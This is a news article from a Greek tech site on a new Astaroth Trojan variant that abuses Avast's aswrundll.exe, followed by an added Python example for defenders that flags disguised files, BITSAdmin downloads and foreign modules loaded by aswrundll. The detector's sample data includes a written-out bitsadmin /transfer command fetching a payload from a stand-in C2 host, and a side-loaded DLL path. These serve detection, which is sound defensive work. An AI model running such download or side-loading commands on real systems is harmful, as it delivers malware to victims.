Astaroth Trojan: uses antivirus processes

A new version of the Astaroth Trojan is able to abuse vulnerable processes of antivirus software and services. Researchers from Cybereason's Nocturnus team reported today in a post on their blog that the variant can use security software modules to steal credentials and personal data on the internet. In its latest form, Astaroth is being used in spam campaigns across Brazil and Europe, and had racked up thousands of infections by the end of 2018. The malware spreads through .zip files and malicious links.

Astaroth Trojan: How It Works

Researchers report that the Trojan disguises itself as a JPEG, a .GIF, or a file with no extension at all, to avoid detection by security applications when it runs on a machine. To complete the download of the malware, the Microsoft Windows BITSAdmin tool is used to fetch it from a command-and-control (C2) server. Once downloaded, the malware runs an XSL script that opens a connection to the C2 server. The script allegedly contains functions that help the malware hide from security software, and that also use the BITSAdmin tool to download malicious payloads from a separate C2 server.

Earlier variants of the Trojan would then look for antivirus programs and, if Avast was present on an infected system, the malware would stop running. The new Astaroth, however, can fool the antivirus program and insert "a malicious module into one of its processes", according to the researchers. If it detects Avast, it abuses the Avast Software Runtime Dynamic Link, which runs modules for Avast through the aswrundll.exe process. That executable, which resembles Microsoft's rundll32.exe, can run DLLs by calling their exported functions.

The Trojan first appeared in attacks against users in South America during 2017. The malware can steal information from target systems, such as passwords, keystrokes and anything that was on the clipboard. In addition, Astaroth can monitor calls if installed on a suitable device, and terminate various processes. The new malware also uses a fromCharCode() deobfuscation method to hide code execution.

Last month, a new study published by Malwarebytes reported that Trojan and backdoor attacks have more than doubled since the previous year. Spyware attacks have also become more frequent, rising 142% over the same period.
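The behaviours described above each leave a trace a defender can look for: a file whose extension does not match its contents, BITSAdmin being used to pull a file down, aswrundll.exe being handed a module from outside Avast's own folder, and JavaScript strings hidden behind String.fromCharCode(). The following Python is an added example written for this article; it is not code from iGuRu.gr or from the Cybereason research it reports. The log events, file bytes, paths and URL are constructed for illustration, and the Avast install directory is an assumption.

```python
"""Defender-side triage helpers for the Astaroth behaviours described above.

Added example, not code from the article or from the research it summarises.
Every sample (log events, file bytes, paths, URL) below is constructed.
"""
import re
from typing import List, Tuple

# Magic bytes for the image formats the report says the loader masquerades as.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def extension_mismatch(name: str, data: bytes) -> bool:
    """True when a file claims an image extension but its first bytes are not
    that format's signature (e.g. a script or PE file dressed up as a .jpg)."""
    lower = name.lower()
    dot = lower.rfind(".")
    ext = lower[dot:] if dot >= 0 else ""
    if ext not in MAGIC:
        return False  # unknown or missing extension: nothing to compare against
    return not any(data.startswith(sig) for sig in MAGIC[ext])


# Assumed location of Avast's own binaries and modules.
AVAST_DIR = r"c:\program files\avast software\avast"


def triage_process_events(events: List[Tuple[str, str, str]]) -> List[str]:
    """Return alert strings for process-creation events given as
    (parent_image, image_path, command_line).

    Two behaviours from the write-up are checked:
      * bitsadmin.exe used with /transfer (the BITSAdmin download step), and
      * aswrundll.exe pointed at a module outside the Avast install directory
        (the "malicious module in one of its processes" technique).
    """
    alerts = []
    for parent, image, cmdline in events:
        img = image.lower().rsplit("\\", 1)[-1]
        cl = cmdline.lower()
        if img == "bitsadmin.exe" and re.search(r"/transfer\b", cl):
            alerts.append(f"bitsadmin transfer spawned by {parent}: {cmdline}")
        if img == "aswrundll.exe":
            # Split the command line into quoted or bare tokens; token 0 is the image.
            tokens = [a or b for a, b in re.findall(r'"([^"]*)"|(\S+)', cl)]
            for arg in tokens[1:]:
                if "\\" in arg and not arg.startswith(AVAST_DIR):
                    alerts.append(f"aswrundll.exe given module outside Avast dir: {cmdline}")
    return alerts


FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")


def decode_fromcharcode(script: str) -> str:
    """Replace each String.fromCharCode(n, n, ...) call with the string literal it
    builds, so an analyst can read the hidden text without executing the script."""
    def repl(m: "re.Match[str]") -> str:
        nums = [int(n) for n in re.findall(r"\d+", m.group(1))]
        return repr("".join(chr(n) for n in nums))
    return FROMCHARCODE.sub(repl, script)


# Constructed sample events: (parent image, image path, command line).
SAMPLE_EVENTS = [
    ("cmd.exe", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer job1 /download /priority normal "
     r"http://c2.example/update.gif C:\Users\victim\AppData\Local\Temp\update.gif"),
    ("svchost.exe", r"C:\Windows\System32\bitsadmin.exe", "bitsadmin /list"),
    ("explorer.exe", r"C:\Program Files\AVAST Software\Avast\aswrundll.exe",
     r'"C:\Program Files\AVAST Software\Avast\aswrundll.exe" '
     r'"C:\Users\victim\AppData\Local\Temp\update.dll"'),
    ("AvastSvc.exe", r"C:\Program Files\AVAST Software\Avast\aswrundll.exe",
     r'"C:\Program Files\AVAST Software\Avast\aswrundll.exe" '
     r'"C:\Program Files\AVAST Software\Avast\defs\module.dll"'),
]

if __name__ == "__main__":
    print(extension_mismatch("invoice.jpg", b"MZ\x90\x00"))   # PE header behind a .jpg name
    print(extension_mismatch("photo.jpg", b"\xff\xd8\xff\xe0"))  # a real JPEG
    for alert in triage_process_events(SAMPLE_EVENTS):
        print(alert)
    print(decode_fromcharcode("var u = String.fromCharCode(104,116,116,112);"))
```

Only the first and third sample events should raise alerts: a plain `bitsadmin /list` is routine administration, and aswrundll.exe loading a module from its own directory is Avast's normal behaviour. The magic-byte check is deliberately narrow (it only rules on extensions it knows), so a file with no extension, which the report also mentions, would need a separate content-based check.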

iGuRu.gr - The Best Technology Site in Greece


Written by giorgos
